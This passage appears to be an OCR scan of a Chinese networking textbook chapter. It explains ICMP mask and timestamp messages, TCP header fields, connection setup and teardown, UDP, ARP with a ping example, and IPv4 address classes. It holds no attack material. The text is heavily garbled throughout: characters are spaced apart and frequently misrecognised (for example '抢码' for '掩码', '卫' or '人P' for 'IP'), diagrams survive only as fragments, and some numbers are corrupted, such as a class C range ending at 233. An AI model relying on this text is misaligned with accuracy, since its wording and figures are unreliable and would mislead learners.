中 的 ICMP 报 文 相 比 ， 这 个 报 文 额外 包含 3 个 字段 :标识 符 、 序 列 号 和 子 网 掩 码 。 在 发 送 
请 求 的 时 候 标 识 符 和 序列 号 由 请 求 的 主机 随意 填充 ， 应 答 时 会 返回 这 些 值 ， 应 答 的 主机 填 
充 子 网 抢 码 后 发 送 给 请 求 主机 ， 请 求 主机 对 比 发 送 和 接收 到 的 标识 符 和 序列 号 是 否 一 致 ， 
由 此 来 决定 本 机 的 请 求 是 否 有 效 。 


以 太 网 头 部 
(14 字 节 ) (20 字 节 ) (8 字 节 ) (20 字 节 ) (8 字 节 ) 
图 5.10 “UDP 端口 不 可 达 ” 的 数据 结构 示意 图 
0 pe 15 16 31 
类 型 
47 或 者 18) | 代码 (0) 校 验 和 
标识 符 序列 号 12 字 节 
子 网 掩 码 
图 5.11 ICMP 子 网 掩 码 请 求 应 答 的 数据 格式 
地 址 抢 码 请 求 和 发 送 的 过 程 均 对 上 述 的 字段 进行 处 理 ， 下 面 是 一 个 请 求 发 送 和 接收 的 
具体 过 程 和 相关 的 操作 。 
口 请 求 方 类 型 值 为 17， 代 码 为 0， 填 充 标识 符 和 序列 号 ， 计 算 校 验 和 后 将 请 求 发 送 
到 网 络 上 。 


口 应 答 方 类 型 值 为 18， 代 码 为 0， 标 识 符 和 序列 号 为 请 求 方 的 值 ， 填 充 合适 的 子 网 
挖 码 ， 计 算 校 验 和 后 返回 给 请 求 方 。 


5. 时 间 戳 的 请 求 应 答 格式 


一 个 主机 可 以 使 用 ICMP 的 时 间 戳 请 求 向 另 一 个 主机 查询 当前 时 间 ， 其 格式 如 图 5.12 
所 示 。 标 识 符 和 序列 号 的 含义 与 网 络 掩 码 的 请 求 应 答 相 同 。 时 间 戳 表示 的 是 一 个 自 子夜 开 
始 的 毫秒 数 ， 发 起 时 间 戳 为 发 起 方 发 起 请 求 时 的 时 间 ， 接 收 时 间 戳 为 接收 方 接收 到 请 求 的 
时 间 惟 ， 传 送 时 间 戳 为 接收 方 发 送 响应 的 时 间 戳 。 发 起 时 间 戳 由 请 求 主机 填充 ， 接 收 时 间 
鹤 和 传送 时 间 蕉 由 应 答 主 机 填充 ， 通常 后 两 个 时 间 蕉 是 一 致 的 。 

利用 时 间 戳 请 求 应 答 可 以 计算 网 络 上 与 目的 主机 的 响应 时 间 ， 如 图 5.13 所 示 。 其 中 的 
“请 求 ”为 请 求 方 到 应 答 方 的 网 络 传输 时 间 〈 还 有 协议 栈 的 处 理 时 间 ， 但 是 很 少 ),“ 应 答 ” 
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0 7 8 15 16 31 
i 代码 (0) 校 验 和 
标识 符 序列 号 
请 求 时间 戳 20 字 节 
接收 时 间 戳 
传送 时 间 惟 


图 5.12 ICMP 时 间 戳 请 求 应 答 的 数据 格式 


为 应 答 方 到 请 求 方 的 网 络 传输 时 间 。“ 请 求 ” 过 程 时 间 为 接收 时 间 戳 与 请 求 时 间 截 的 差 值 ， 
“应 答 ” 过 程 时 间 为 请 求 方 接收 到 应 答 的 时 间 与 传送 时 间 戳 的 差 值 。 
请 求 方 发 起 请 求 应 答 方 接收 请 求 。 “应答 方 发 送 应 答 请 求 方 接收 应 答 
请 求 | 应 答 


上 往返 时 间 -| 


图 5.13 ”利用 时 间 戳 请 求 应 答 计算 主机 间 的 响应 时 间 


5.2.5 ”传输 控制 协议 (TCP) 


传输 控制 协议 (Transmission Control Protocol)， 简 称 TCP 协议 ， 它 在 原 有 IP 协议 的 
基础 上 ， 增 加 了 确认 重 发 、 滑 动 窗口 和 复 用 / 解 复 用 等 机 制 ， 提 供 一 种 可 靠 的 、 面 向 连接 的 
字 节 流 服务 。 


1. TCP 的 特点 


TCP 协议 的 特点 如 下 所 述 。 

口 字 节 流 的 服务 : 使 用 TCP 协议 进行 传输 的 应 用 程序 之 间 传 输 的 数据 可 视 为 无 结构 
的 字 节 流 ， 基 于 字 节 流 的 服务 没有 字 节 序 问 题 的 困扰 。 

口 面向 连接 的 服务 : 在 数据 进行 传输 之 前 ，TCP 协议 需要 先 建立 连接 ， 之 后 的 TCP 
报 文 在 此 连接 的 基础 上 传输 。 

口 可 靠 传输 服务 : 基于 校 验 和 应 答 重 发 机 制 保证 传输 的 可 靠 性 。 接 收 方 对 接收 到 的 
报 文 进行 校 验 和 计算 ， 如 果 有 误 ， 不 发 送 确认 应 答 ， 发 送 方 在 超时 后 会 自动 重 发 
此 报 文 。 

口 缓冲 传输 : 缓冲 传输 可 以 延迟 传送 应 用 层 的 数据 ， 允 许 将 应 用 程序 需要 传送 的 数 
据 积攒 到 一 定 的 数量 才 进 行 集中 发 送 。 

口 全 双 工 传输 : 各 主机 TCP 协议 以 全 双 工 的 方式 进行 数据 流 交 换 。 

口 流量 控制 ，TCP 协议 的 滑动 窗口 机 制 ， 支 持 主机 间 的 端 到 端的 流量 控制 。 


2. TCP 的 数据 格式 
TCP 在 IP 协议 的 基础 上 进行 传输 数据 , TCP 数据 在 IP 报 文中 的 位 置 , 如 图 5.14 所 示 。 


i 
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JP 数 据 
TCP 数 据 
IP 头 部 (20 字 节 ) TCP 头 部 (20 字 节 ) TCP 数 据 
图 5.14 TCP 数据 在 IP 报 文中 的 位 置 


TCP 数据 包含 头 部 和 数据 两 部 分 ， 其 数据 格式 如 图 5.15 所 示 。 主 要 有 源 端 口号 、 目 的 
端口 号 、 序 列 号 、 确 认 号 、 头 部 长 度 、 控 制 位 、 窗 口 尺寸 、TCP 校 验 和 、 紧 急 指 针 和 选项 


0 1516 31 
源 端 口号 (16 位 ) | 目的 端口 号 (16 位 ) 
序列 号 (32 位 ) 
确认 号 (32 位 ) 
3 20 个 字 节 
2 es luro|ack PSH|Rsr| sw rm | 窗口 尺寸 16 位 ) 
TCP 榨 验 和 (16 位 ) | 紧急 指针 (16 位 ) 
选项 (32 位) 
数据 
图 5.15 ”TCP 报 文 的 数据 格式 
口 源 端 口号 和 目的 端口 号 : 这 两 个 字段 均 为 16 位 的 长 度 ， 表 示 发 送 端 和 接收 端的 端 


口 口 


口 ， 用 于 确认 发 送 端 和 接收 端的 应 用 程序 。 发 送 端的 IP 地 址 和 端口 号 及 接收 端的 
IP 地 址 和 端口 号 可 以 确认 一 个 在 Intemet 上 的 TCP 连接 。 

序列 号 : 序列 号 是 一 个 32 位 长 度 的 字段 , 表示 分 配给 TCP 包 的 编号 。 序 列 号 用 来 
标识 应 用 程序 从 TCP 的 发 送 端 到 接收 端 发 送 的 字 节 流 。 当 TCP 开始 连接 的 时 候 ， 
发 送 一 个 序列 号 给 接收 端 ， 连 接 成 功 后 ， 这 个 序列 号 作为 初始 序列 号 ISN (Initial 
Sequence Number) 。 建 立 连接 成 功 后 发 送 的 第 一 个 字 节 的 序列 号 为 ISN+1， 之 后 
发 送 数 据 ISN 将 按照 字 节 的 大 小 进行 递增 。 序列 号 是 一 个 32 位 的 无 符号 数 ， 到 达 
2 的 32 次 方 减 1 之 后 从 0 开始 。 

确认 号 : 发 送 方 对 发 送 的 首 字 节 进行 了 编号 ， 当 接收 方 成 功 接收 后 ， 发 送 
成 功 的 序列 号 加 1 表示 确认 ， 发 送 方 再 次 发 送 的 时 候 从 确认 号 开始 。 

头 部 长 度 : 表示 TCP 头 部 的 长 度 ， 由 于 TCP 的 数据 有 可 选 字段 ， 头 部 长 度 用 于 表 
示 头 部 的 长 度 。 此 字段 的 长 度 为 4 位 , 表示 的 是 32 位 字 长 的 数据 。 因 此 TCP 的 头 
部 最 长 为 60 个 字 节 ， 如 果 没 有 可 选 字段 通常 为 20 字 节 。 

保留 位 : 6 位 长 度 没 有 使 用 ， 必 须 设 为 0。 

控制 位 : 6b， 用 做 控制 位 ， 可 以 多 个 位 一 起 设置 ， 含 义 在 表 5.4 中 进行 说 明 。 
窗口 尺寸 : 窗口 尺寸 也 称 接 收 窗 口 大 小 ， 表 示 本 机 上 TCP 协议 可 以 接收 的 以 字 节 
为 单位 的 数目 ， 本 字段 为 16b 大 小 。 


be 


接收 


1 
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表 5.4 TCP 控制 位 的 含义 


字段 含义 

URG 紧急 指针 字段 

ACK 表示 确认 号 有 效 

PSH 表示 接收 方 需要 尽快 将 此 数据 交 给 应 用 层 
RST 重建 连接 

SYN 用 于 发 起 一 个 TCP 的 连接 

FIN 用 于 表示 将 要 断 开 TCP 连接 


口 校 验 和 : 16b。 用 于 校 验 TCP 传输 数据 的 正 误 ， 包 括 TCP 头 和 所 有 数据 ，TCP 的 
数据 必须 强制 校 验 。 

口 紧急 指针 : 16b。 只 有 设置 了 URG 位 才 有 效 ， 它 指出 了 紧 接 紧急 数据 的 字 节 的 顺 
序 编号 。 

口 选项 : 经 常 使 用 的 为 最 大 分 段 长 度 MSS (Maximum Segment Size) 。TCP 连接 通 
常 在 第 一 个 通信 的 报 文中 指明 这 个 选项 ， 它 指明 当前 主机 所 能 接收 的 最 大 报 文 
长 度 。 


3. 建立 连接 的 三 次 握手 


主机 A 和 主机 B 要 使 用 TCP 协议 进行 通信 ， 需 要 先 建立 一 条 TCP 连接 ,如 图 5.16 所 
示 。 为 了 建立 一 条 TCP 的 连接 ， 主 机 A 和 B 需要 进行 三 次 通信 过 程 (通常 称 为 “三 次 握 
手 ”，three way handshake )。 


主机 A 主机 B 


1234567890 


98165432) 


se 


a 
< 987654322 


图 5.16 三 次 握手 过 程 


(1) 主机 A 发 送 一 个 SYN 段 到 主机 B 告诉 B 想 要 连接 的 主机 端口 ， 以 及 初始 的 序列 
写 (ISN， 这 里 为 1234567890)。 

(2) 主机 B 应 答 ， 其 中 SYN 段 为 主机 B 的 初始 序列 号 (ISN， 这 里 为 987654321)， 
ack 段 为 主机 A 发 送 的 ISN+1， 即 1234567891。 
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(3) 主机 A 将 主机 B 发 送 的 SYN 段 +1 作为 确认 号 返回 给 主机 B 作为 应 答 。 

上 面 3 个 步骤 完成 了 TCP 连接 的 建立 ， 连 接 建立 之 后 ， 主 机 A 和 主机 B 之 间 可 以 进 
行 TCP 的 数据 接收 和 发 送 操作 了 。 

4. 释放 连接 的 四 次 握手 过 程 


建立 一 个 TCP 连接 需要 3 次 握手 ， 而 终止 一 个 TCP 连接 则 需要 4 次 握手 。 如 图 5.17 
所 示 为 一 个 主机 A 主动 发 起 的 与 主机 B 终止 TCP 连接 的 过 程 。 


下 主机 B 
第 次 FIN jog 
456; 
| 
第 二 次 
ack 1234567892 
| 
234567892 人 
FIN 987654322/ack L 


第 四 次 庆 
| 


图 5.17 释放 TCP 连接 的 四 次 握手 过 程 


(1) 主机 ATCP 协议 栈 发 送 FIN 字段 ， 序 列 号 为 1234567891 的 释放 连接 请 求 。 

(2) 主机 B 先 确 认 主 机 A 的 FIN 请 求 ， 确 认 号 为 1234567892， 在 主机 A 序列 号 上 
加 1。 

(3) 主机 B 发 送 FIN 请 求 。 

(4) 主机 A 对 主机 B 的 FIN 请 求 确认 。 


5. TCP 的 封装 解 封 过 程 


图 5.18 所 示 为 使 用 TCP 协议 的 应 用 程序 的 数据 传输 过 程 ， 用 户 数据 由 主机 A 发 送 给 
主机 B， 数 据 封装 在 TCP 的 数据 部 分 。 
发 送 的 过 程 是 一 个 封包 的 过 程 。 在 主机 A 上 ， 在 传输 层 ， 用 户 发 送 的 数据 增加 TCP 
头 部 ， 用 户 数据 封装 在 TCP 的 数据 部 分 。 在 IP 层 增加 IP 的 头 部 数据 ，TCP 的 数据 和 头 部 
都 封装 在 IP 层 的 数据 部 分 。 卫 层 将 数据 传输 给 网 络 设备 的 驱动 程序 ， 以 太 网 增加 头 部 和 
尾部 后 ， 发 送 到 以 太 网 上 。 

接收 数据 的 过 程 是 一 个 解 封 包 的 过 程 。 在 主机 B 上 , 驱动 程序 从 以 太 网 上 接收 到 数据 ， 
然后 将 数据 去 除 头 部 和 尾部 并 进行 CRC 校 验 后 ， 将 正确 的 数据 传递 给 IP 层 。 了 PP 层 剥 去 全 
头 ， 进 行 校 验 ， 将 数据 发 送 给 其 上 层 TCP 层 。TCP 则 将 TCP 的 包头 剥 去 ， 根 据 应 用 程序 
的 标识 符 判断 是 否 发 送 给 此 应 用 程序 。 在 主机 B 上 的 应 用 程序 会 得 到 干净 的 有 效 数 据 ， 然 
后 进行 处 理 。 


SS 
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主机 A | 应 用 层 主机 B 
发 送 数据 | 数据 接收 数据 
应 用 程序 数据 应 用 程序 
| 
TCP TCP 头 部 | 数据 TCP 
| 圭 EE 解 
卫 四 IP 头 部 | TCP 头 部 | 数据 者 了 下 
| EE t 
驱动 程序 驱动 程序 

46-~1500 字 节 | 
以 太 网 以 太 网 头 部 | IP 头 部 | TCP 头 部 | 数据 | 以 太 网 尾部 
= 以 太 网 数据 -| 


图 5.18 TCP 通信 的 数据 封装 解 封 过 程 


5.2.6 用 户 数据 报 文 协议 CUDP) 
UDP 是 一 种 基于 IP 协议 的 不 可 靠 网 络 传输 协议 ， 在 人 P 数据 的 位 置 如 图 5.19 所 示 。 
= IP 数 据 


UDP 数 据 一 一 一 一 一 一 一 ~ 


卫 头 部 (20 字 节 ) UDP 头 部 〈8 字 节 ) | UDP 数 据 


图 5.19 UDP 数据 在 IP 数据 的 位 置 


UDP 协议 是 TCP/IP 的 传输 层 协议 的 一 部 分 , 与 TCP 的 传输 不 一 样 , 它 提供 无 连接 的 、 
不 可 靠 的 传输 服务 。UDP 协议 把 应 用 程序 需要 传递 的 数据 发 送出 去 ， 不 提供 发 送 数据 包 的 
顺序 ， 接 收 方 不 向 发 送 方 发 送 接收 的 确认 信息 ， 如 果 出 现 丢 包 或 者 重 包 的 现象 ， 也 不 会 向 
发 送 方 发 送 反馈 , 因此 不 能 保证 使 用 UDP 协议 的 程序 发 送 的 数据 一 定 到 达 了 接收 方 或 者 到 
达 接 收 方 的 数据 顺序 和 发 送 方 的 一 致 性 。 

使 用 UDP 协议 传输 数据 的 应 用 程序 ， 必 须 自 己 构建 发 送 数据 的 顺序 机 制 和 发 送 接收 
的 确认 机 制 , 以 此 来 保证 发 送 数 据 的 正确 到 达 , 保证 接收 数据 的 顺序 与 发 送 数据 的 一 致 性 ， 
也 就 是 说 ， 应 用 程序 必须 根据 UDP 的 缺点 提供 解决 方案 。 

UDP 协议 相 比较 TCP 协议 执行 时 的 速度 要 比 TCP 快 得 多 ， 因 为 UDP 协议 简单 得 多 ， 
对 系统 造成 的 负载 低 。 在 高 负载 的 系统 〈 例 如 服务 器 ) 或 者 系统 资源 受 限 的 系统 〈 例 如 嵌 
入 式 系统 ) 上 应 用 比较 多 ， 在 不 需要 可 靠 传输 的 应 用 程序 上 有 比较 广泛 的 应 用 ， 例 如 流 媒 
体 的 传输 、 域 名 服务 器 、 艇 入 式 机 项 盒 系统 等 。 


1. UDP 的 数据 格式 
UDP 传输 数据 时 的 字段 格式 如 图 5.20 所 示 。 
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0 1516 31 
源 端口 号 46 位 ) 目的 端口 号 (16 位) 
UDP 数据 长 度 (16 位 ) UDP 校 验 和 (16 位 ) 


图 5.20 UDP 数据 格式 


口 源 端 口号 和 目的 端口 号 分 别 是 一 个 16 位 的 字段 , 用 来 表示 发 送 方 和 接收 方 的 UDP 
端口 。 

口 UDP 数据 长 度 表示 UDP 头 部 和 UDP 数据 段 的 长 度 , 单位 为 字 节 。 由 于 UDP 头 部 
为 8 个 字 节 ， 因 此 发 送 UDP 的 长 度 字 段 最 少 为 8 字 节 。UDP 的 长 度 与 IP 协议 的 
长 度 有 关联 性 ，IP 的 长 度 指 的 是 数据 的 全 长 ，UDP 的 长 度 等 于 IP 的 长 度 减 去 IP 
头 部 的 长 度 。 

口 UDP 校 验 和 表示 整个 UDP 字段 的 CRC16 校 验 和 , 它 的 计算 方法 与 IP 字段 是 一 致 
的 。UDP 的 校 验 和 字段 是 可 选 的 ， 即 可 以 不 进行 CRC 校 验 ， 此 时 校 验 和 部 分 为 全 
0。UDP 校 验 和 允许 发 送 的 数据 为 奇数 长 度 ， 此 时 要 加 一 个 空 字 节 ， 即 全 0 的 字 节 
进行 填充 ， 这 个 字 节 仅仅 为 了 方便 计算 校 验 和 ， 不 发 送 到 目的 地 址 。 


2. UDP 数据 的 传输 过 程 


如 图 5.21 所 示 为 使 用 UDP 协议 的 应 用 程序 的 数据 传输 过 程 ， 用 户 数据 由 主机 A 发 送 
给 主机 B， 数 据 封装 在 UDP 的 数据 部 分 。 
主机 A 应 用 层 主机 B 
发 送 数据 数据 接收 数据 
点 用 程序 数据 应 用 程序 
UDP UDP 头 部 | 数据 UDP 
封 UDP 数据 一 解 
1 
卫 和 了 P 头 部 | UDP 头 部 | 数据 圭 正 
| 1 数据 -| | 
驱动 程序 驱动 程序 
| 6150 守节 | 
以 太 网 以 太 网 头 部 | 了 P 头 部 | UDP 头 部 | 数据 | 以 大 网 尾部 
上 以 太 网 数据 一 | 


图 5.21 UDP 协议 层 的 用 户 数据 传输 过 程 


本 
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发 送 的 过 程 是 一 个 封包 的 过 程 。 主 机 A 上 ， 在 传输 层 ， 用 户 发 送 的 数据 增加 UDP 头 
部 ， 用 户 数 据 封装 在 UDP 的 数据 部 分 。 在 IP 层 增加 IP 的 头 部 数据 ，UDP 的 数据 和 头 部 
都 封装 在 IP 层 的 数据 部 分 。IP 层 将 数据 传输 给 网 络 设备 的 驱动 程序 ， 以 太 网 增加 头 部 和 
尾部 后 ， 发 送 到 以 太 网 上 。 

接收 数据 的 过 程 是 一 个 解 封包 的 过 程 。 主 机 B 上 ， 驱 动 程序 从 以 太 网 上 接收 到 数据 ， 
然后 将 数据 去 除 头 部 和 尾部 并 进行 CRC 校 验 后 ， 将 正确 的 数据 传递 给 IP 层 。IP 层 剥 去 IP 
头 ， 进 行 校 验 ， 将 数据 发 送 给 其 上 层 UDP 层 。UDP 则 将 UDP 的 包头 剥 去 ， 根 据 应 用 程序 
的 标识 符 判断 是 否 发 送 给 此 应 用 程序 。 在 主机 B 上 的 应 用 程序 会 得 到 干净 的 有 效 数据 ， 然 
后 进行 处 理 。 


5.2.7 ”地 址 解析 协议 (ARP) 


在 以 太 网 为 基础 的 局 域 网 中 ， 每 个 网 络 接口 都 有 一 个 硬件 地 址 ， 这 是 一 个 48b 的 值 ， 
标识 不 同 的 以 太 网 设备 ， 在 局 域 网 中 的 必须 知道 网 络 设备 的 硬件 地 址 才能 向 目的 主机 发 送 
数据 。 而 在 网 际 网 中 数据 传输 的 目的 地 址 是 IP 地 址 , 数据 要 能 够 正确 地 传输 ,必须 建立 人 P 
地 址 和 硬件 地 址 的 对 应 关系 ，ARP 协议 就 是 起 这 种 作用 的 。 

ARP 协议 为 IP 地 址 到 硬件 地 址 提供 动态 的 映射 关系 , 如 图 5.22 所 示 为 进行 IP 地 址 和 
硬件 地 址 映射 的 ARP 映射 关系 图 。ARP 的 高 速 缓存 维持 这 种 映射 关系 ， 其 中 存放 了 最 近 
IP 地 址 到 硬件 地 址 的 映射 记录 ， 高 速 缓存 中 的 每 项 记录 的 生存 时 间 为 20 分 钟 ， 开 始 时 间 


从 映射 关系 建立 时 算 起 。 
ARP 一 一 一 | 48 位 硬件 地 址 


图 5.22 IP 地 址 到 硬件 地 址 映射 的 ARP 协议 


32 位 IP 地 址 


1. ARP 过 程 


如 图 5.23 所 示 为 同一 局 域 网 中 的 主机 A 和 主机 B，IP 地 址 分 别 为 192.168.1.150 和 
192.168.1.151。 下 面 是 一 个 ping 过 程 的 实例 , 用 这 个 实例 来 说 明 ARP 协议 的 作用 和 在 实际 
过 程 中 的 位 置 。 
主机 A 主机 B 


ss 192.168.1.150 < 
192.168.1.151 


图 5.23 ”同一 局 域 网 中 的 主机 A 和 主机 了 B 
主机 A 用 ping 命令 探测 主机 B， 命 令 如 下 : 


a 
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S$ping B 
其 过 程 如 图 5.24 所 示 ， 会 进行 如 下 过 程 的 步 又， 步骤 的 编号 已 在 图 5.24 中 标 出 。 
主 机 A 主 机 B 
192.168.1.150 192.168.1.151 
主机 名 
又 a 
IP 地 址 
DNS 服 务 器 Ping 程 序 接收 到 ICMP 请 求 
步骤 g 步骤 f 发送 ICMP 响 应 包 
发 送 ICMP 包 | 接收 来 自主 机 B 
的 ICMP 响 应 包 


Ye 


J 接收 到 ARP 
广播 请 求 步骤 d 
网 络 驱动 物 序 | Fe 和 
7 发 送 ICMP 包 民 人 REN 42 
发 送 ARP 请 求 信 播 接收 到 ARP 响 应 | 主机 B 步 骤 e sa 
; - 


以 太 网 
图 5.24 主机 A 对 主机 B 进行 ping 的 过 程 


口 步骤 a: 应 用 程序 ping 会 判断 发 送 的 是 主机 名 还 是 IP 地 址 ， 调 用 函数 gethostby- 
name() 解 析 主 机 名 B， 将 主机 名 转换 成 一 个 32 位 的 IP 地 址 。 这 个 过 程 叫做 DNS 
域名 解析 。 

口 步骤 b: ping 程序 向 目的 IP 地 址 发 送 一 个 ICMP 的 ECHO 包 。 

口 步骤 c: 由 于 主机 A 和 主机 B 在 同一 个 局 域 网 内 ， 必 须 把 目标 主机 的 IP 地 址 转换 

为 48 位 的 硬件 地 址 ， 即 调用 ARP 协议 ， 在 局 域 网 内 发 送 ARP 请 求 广播 ， 查 找 主 

机 B 的 硬件 地 址 。 

口 步骤 d: 主机 B 的 ARP 协议 层 接收 到 主机 A 的 ARP 请 求 后 ， 将 本 机 的 硬件 地 址 

填充 到 合适 的 位 置 后 ， 发 送 ARP 应 答 到 主机 A。 

步骤 e: 发 送 ICMP 数据 包 到 主机 B。 

步骤 f: 主机 B 接收 到 主机 A 的 ICMP 包 ， 发 送 响应 包 。 

口 步骤 g: 主机 A 接收 到 主机 B 的 ICMP 响应 包 。 
在 ping 命令 之 后 可 以 查看 ARP 的 高 速 缓存， 用 arp 命令 加 -v 选项 进行 检查 ，-v 选项 

是 显示 详细 信息 ， 下 面 是 一 个 主机 的 ARP 高 速 缓存 中 的 内 容 : 


口 
口 


$arp -Vv 

地 址 类 型 ”硬件 地 址 示 志 Mask 接口 
localhost ether 00:50:56:£f7:88:37  C eth0 
localhost ether 00:50:56:e3:84:f0  C eth0 


2. ARP 分 组 数据 格式 
以 太 网 的 地 址 解析 协议 ARP 协议 分 组 数据 格式 如 图 5.25 所 示 。ARP 协议 的 实现 方式 
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是 在 以 太 网 上 做 广播 ， 查 询 目的 IP 地 址 ， 接 收 到 ARP 请 求 的 主机 响应 请 求 方 ， 将 本 机 的 


MAC 地 址 反馈 给 请 求 的 主机 。 


- 以 太 网 头 部 ~|- ARP 请 求 /应 答 -| 
百 的 “| 源 硕 件 一 [硬件 地 | 协议 地 T 操作 | 发送 方 硬件 | 发送 方 下 | 按 收 方 硬 | 接收 方 
硬件 地 址 | 地址 。 | 是 类 型 | 硬件 类 型 | 协议 美 型 | 址 长 度 | 址 长 度 | 方式 | 。 地址 地 址 | 件 地 址 | 全 地 址 


(6 字 节 ) (6 字 节 ) (2 字 节 ) (2 字 节 ) (2 字 节 ) (1 字 节 ) (1 字 节 ) (2 字 节 ) (6 字 节 ) (2 字 节 ) 


图 5.25 ARP 分 组 字段 格式 


(6 字 节 ) (2 字 节 ) 


口 以 太 网 头 部 部 分 的 目的 硬件 地 址 和 源 硬件 地 址 ， 分 别 为 以 太 网 硬件 的 地 址 的 发 送 
方 和 接收 方 的 硬件 地 址 ， 例 如 MAC 地 址 。 当 目的 硬件 地 址 为 全 1 ( 即 0xFF FF FF 
FF FF FF) 的 地 址 时 ， 为 广播 帧 ， 在 以 太 网 上 的 所 有 接口 都 要 接收 此 帧 数据 。 

口 帧 类 型 为 两 个 字 节 长 度 ， 表 示 后 面 数 据 的 类 型 。 对 于 ARP 请 求 应 答 ， 该 字段 为 
0x0806。 

口 硬件 类 型 表示 硬件 地 址 的 类 型 ， 值 为 1 表示 以 太 网 硬件 地 址 。 

口 协议 类 型 表示 要 映射 的 协议 地 址 类 型 ， 值 为 0x0800 表示 询问 卫 地 址 。 

口 硬件 地 址 长 度 ， 表 示 硬 件 地 址 以 字 节 为 单位 的 长 度 ， 对 于 ARP 请 求 来 说 ,硬件 地 
址 为 以 太 网 的 MAC 地 址 ， 值 为 6。 

口 协议 地 址 长 度 ， 表 示 协 议 地 址 以 字 节 为 单位 的 长 度 ， 对 于 ARP 请 求 来 说 ， 协 议 地 
址 为 耳 地 址 ， 为 32 位 ， 值 为 4。 


口 操作 方式 字段 为 本 次 操作 的 类 型 ， 可 选 方式 如 表 5.5 所 


示 ， 


不 同 来 确定 。 

口 余下 的 4 个 字段 分 别 为 发 送 方 的 硬件 地 址 、 发 送 方 的 人 P 
地 址 、 接 收 方 的 硬件 地 址 、 接 收 方 的 他 地 址 。 

ARP 请 求 应 答 的 操作 方式 很 简单 ， 将 接受 到 数据 字段 的 发 


ARP 请 求 帧 和 ARP 应 答 帧 的 区 别 可 用 此 字段 的 值 


送 方 和 接收 方 的 值 对 调 ， 将 所 有 本 机 的 硬件 地 址 和 IP 地 址 的 值 
填充 到 合适 的 发 送 方位 置 。 

在 ARP 操作 中 ,有 效 数据 的 长 度 为 28 个 字 节 ; 不 足以 太 网 定义 的 最 小 长 度 46 字 节 长 
度 ， 需 要 填充 字 节 ， 填充 字 节 最 小 长 度 为 18 个 字 节 。 


要 想 使 


S$.3 ”IP 地 址 分 类 与 TCP/UDP 端口 


特 网 地 址 使 


表 5.5 ARP 操作 方式 


含义 
ARP 请 求 
ARP 应 答 
RARP 请 求 
RARP 应 答 


网 络 设备 或 者 主机 能 够 连接 到 Internet， 必 须 为 网 络 设备 配置 IP 地 址 。 由 于 在 
Intemet 上 IP 地 址 是 全 世界 唯一 的 ， 卫 地 址 可 以 标识 一 
的 是 IPv4 (IP 第 4 版 本 ) 的 他 地 址 ， 长 为 32 位 ， 由 4 组 十 进 制 数 组 成 ， 每 


个 主机 。 目 前 应 用 范围 最 广泛 的 因 


组 数值 的 范围 为 0 一 255， 中 间 用 点 号 〈“.”) 隔 开 ， 称 之 为 四 组 “点 分 二 进 制 ” 例如 ，IP 


地 址 172.16 


.12.204 对 应 的 二 进 制 表达 方式 为 : 


10101100 00010000 00001100 11001100 


-le 
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5.3.1 因特网 中 IP 地 址 的 分 类 


一 个 卫 地 址 由 了 王 地 址 类 型 、 网 络 ID 和 主机 ID 组 成 。 网 络 类 型 标识 本 卫 地 址 所 属 的 
类 型 ， 网 络 ID 标识 卫 表示 设备 或 主机 所 在 的 网 络 , 主机 ID 标识 网 络 上 的 工作 站 、 服 务 器 
或 路 由 选择 器 。 每 个 网 络 设备 对 应 的 网 络 ID 必须 唯一 ， 在 同一 个 网 络 中 各 网 络 设备 的 主 
机 ID 不 能 重复 。IP 地 址 的 一 般 格 式 为 : 

类 别 + 网 络 标识 + 主机 标识 


口 类 别 : 用 来 区 分 IP 地 址 的 类 型 ; 
口 网 络 标识 (NetworkID) : 表示 主机 所 在 的 网 络 ; 
口 主机 标识 (Host ID) : 表示 主机 在 网 络 中 的 标识 。 


1. IP 地 址 的 分 类 


IP 地 址 通常 分 为 5 类 : A 类 、B 类 、C 类 、D 类 、E 类 。 

口 A 类 地 址 ， 如 图 5.26 所 示 ， 网 络 标识 占 1 个 字 节 ， 最 高 位 为 0。A 类 网 络 地 址 有 
128 个 ， 允 许 支持 127 个 网 络 ， 每 个 A 类 网 络 大 约 允 许 有 1670 万 台 主 机 存在 。 此 
类 地 址 通常 分 配给 拥有 大 量 主机 的 网 络 ， 如 一 些 大 公司 (如 IBM 公司 等 ) 和 因 特 
网 主干 网 络 ， 这 些 地 址 中 大 约 1/3 已 经 被 分 配 ， 想 得 到 这 类 地 址 是 很 困难 的 。 

0 1 7 8 3 

0 网 络 ID (7bits) 主机 ID (bits) 


图 5.26 A 类 全 地 址 


口 B 类 地 址 : 如 图 5.27 所 示 ，B 类 地 址 的 高 两 位 用 于 标识 这 种 IP 地 址 的 类 型 ， 即 为 
10， 中 间 的 14 位 用 于 标识 网 络 ， 最 后 的 两 个 字 节 (16 位 ) 用 做 主机 标识 。B 类 地 
址 允许 有 16000 个 网 络 ， 每 个 网 络 大 约 允许 有 66000 台 主 机 。B 类 地 址 通常 分 配 
给 结 点 比较 多 的 网 络 ， 如 区 域 网 ， 此 类 IP 地 址 大 约 已 经 分 配 了 5000 个 。 
0_ 1 2 15 16 31 
10 网 络 ID (14bits) 主机 ID (16bits) 


图 5.27 B 类 耳 地 址 
口 C 类 地 址 : C 类 IP 地 址 是 最 常见 的 地 址 ， 如 图 5.28 所 示 。 网 络 标识 占 3 个 字 节 ， 
3 个 高 位 用 于 地 址 类 型 识别 ， 值 为 110。 左 边 3 个 字 中 的 其 余 21 位 用 于 表示 网 络 
寻 址 , C 类 地 址 支持 大 约 209715 个 网 络 。 最 后 一 个 字 节 用 来 标识 主机 ,允许 有 254 


台 主 机 。C 类 地 址 通常 分 配给 结 点 比较 少 的 网 络 ， 例 如 ， 一 些 大 的 校园 网 可 以 拥 
有 多 个 C 类 地 址 。 
23 23 24 31 
110 网 络 ID (21bits) 主机 ID (8bits) 


图 5.28 C 类 人 Pp 地 址 
口 D 类 地 址 : D 类 地 址 是 相当 新 的 ， 前 4 位 为 1110， 此 类 地 址 用 于 组 播 ， 例 如 路 由 


sls 


口 
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器 修改 、 视 频 会 议 等 应 用 系统 都 采用 了 组 播 技术 实现 ， 其 格式 参见 图 5.29。 
0 3 4 31 
1110 多 播 地 址 (28bits) 


图 5.29 DD 类 他 地 址 
E 类 地 址 : 此 类 地 址 为 保留 地 址 ， 目 前 没有 使 用 ， 前 4 位 为 1111。 


这 5 类 了 IP 地 址 的 开始 字段 如 表 5.6 所 示 。 
表 5.6 ”IP 地址 的 分 类 开始 字段 


开始 字段 值 (十 进 制 ) 


开始 字段 值 (十 进 制 ) 


A 类 | 000 一 127 224 一 239 


B 类 | 128~191 240~255 


2 


口 


192~>233 


因特网 规定 的 一 些 特 殊 地 址 
